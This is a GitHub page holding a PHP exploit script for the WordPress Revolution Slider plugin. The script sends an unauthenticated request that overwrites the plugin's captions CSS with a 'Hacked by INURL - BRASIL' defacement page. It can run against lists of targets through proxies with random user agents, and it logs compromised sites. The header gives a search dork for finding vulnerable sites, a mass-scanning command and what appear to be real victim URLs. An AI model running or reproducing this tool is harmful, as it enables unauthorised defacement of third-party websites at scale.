forked from googleinurl/WORDPRESS-Revslider-Exploit-0DAY
/
xplRslide.php
135 lines (118 loc) · 6.37 KB
/
xplRslide.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
<?php
/*
# AUTOR: googleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl/
# YOUTUBE http://youtube.com/c/INURLBrasil
# G+ http://google.com/+INURLBrasil
# Exploit Title: WORDPRESS Revslider Exploit (0DAY)
# Google DORK: inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
# EXECUTE:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'
# USE MASS EXPLOIT SCANNER INURLBR
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt -q 1,6 --command-all 'php inurl_revslider.php -t _TARGET_'
# SCAN: https://github.com/googleinurl/SCANNER-INURLBR
# PRINT: http://i.imgur.com/Fown6vf.png
# Exemples target:
http://victorylakeland.org/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://ndcom.ru/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
*/
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
$op_ = getopt('f:t:', array('help::'));
echo "[+] [Exploit]: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL\nhelp: --help\n\n";
$menu = "
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'
\n";
echo isset($op_['help']) ? exit($menu) : NULL;
$params = array(
'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL,
'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL,
'proxy' => not_isnull_empty($op_['p']) ? $op_['p'] : NULL,
'deface' => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>[ Hacked by INURL - BRASIL ]<br><marque>blog.inurl.com.br<p style='color: transparent'>",
'line' => "--------------------------------------------------------------"
);
not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
not_isnull_empty($params['target']) ? __request($params) . exit() : NULL;
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;
function not_isnull_empty($valor = NULL) {
RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}
function __plus() {
ob_flush();
flush();
}
function __listTarget($file) {
$tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file']))));
echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n";
foreach ($tgt_ as $url) {
echo "\n[+] [INFO] SCANNING : {$url} \n";
__plus();
$file['target'] = $url;
__request($file) . __plus();
}
}
function __setUserAgentRandom() {
$agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox',
'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror', 'Netscape', 'Chrome', 'Dragon', 'SeaMonkey', 'Maxthon', 'IBrowse'
);
$agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD',
'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix',
'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android', 'iPhone', 'Windows NT 6.1', 'BeOS', 'OS 10.5', 'Nokia', 'Arch Linux',
'Ark Linux', 'BitLinux', 'Conectiva (Mandriva)', 'CRUX Linux', 'Damn Small Linux', 'DeLi Linux', 'Ubuntu', 'BigLinux', 'Edubuntu'
);
$locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO',
'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar',
'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK', 'zh_SG', 'zh_TW', 'zh', 'hr_HR', 'hr', 'cs_CZ', 'cs',
'da_DK', 'da', 'nl_BE', 'nl_NL', 'nl', 'en_AU', 'en_CA', 'en_IN', 'en_IE', 'en_MT', 'en_NZ', 'en_PH', 'en_SG', 'en_ZA',
'en_GB', 'en_US', 'en', 'et_EE', 'et', 'fi_FI', 'fi', 'fr_BE', 'fr_CA', 'fr_FR', 'fr_LU', 'fr_CH', 'fr', 'de_AT', 'de_DE'
);
return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)';
}
function __request($__) {
$curlxpl = curl_init();
curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
(!is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL);
curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
curl_setopt($curlxpl, CURLOPT_POST, 1);
curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action","client_action" => "update_captions_css", "data" => $__['deface']));
curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
$result = curl_exec($curlxpl) . __plus();
if (eregi('true', $result)) {
$h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
echo "[!] [INFO] Success Exploit!\n";
echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
__plus();
file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
} else {
echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
}
curl_close($curlxpl);
unset($curlxpl);
}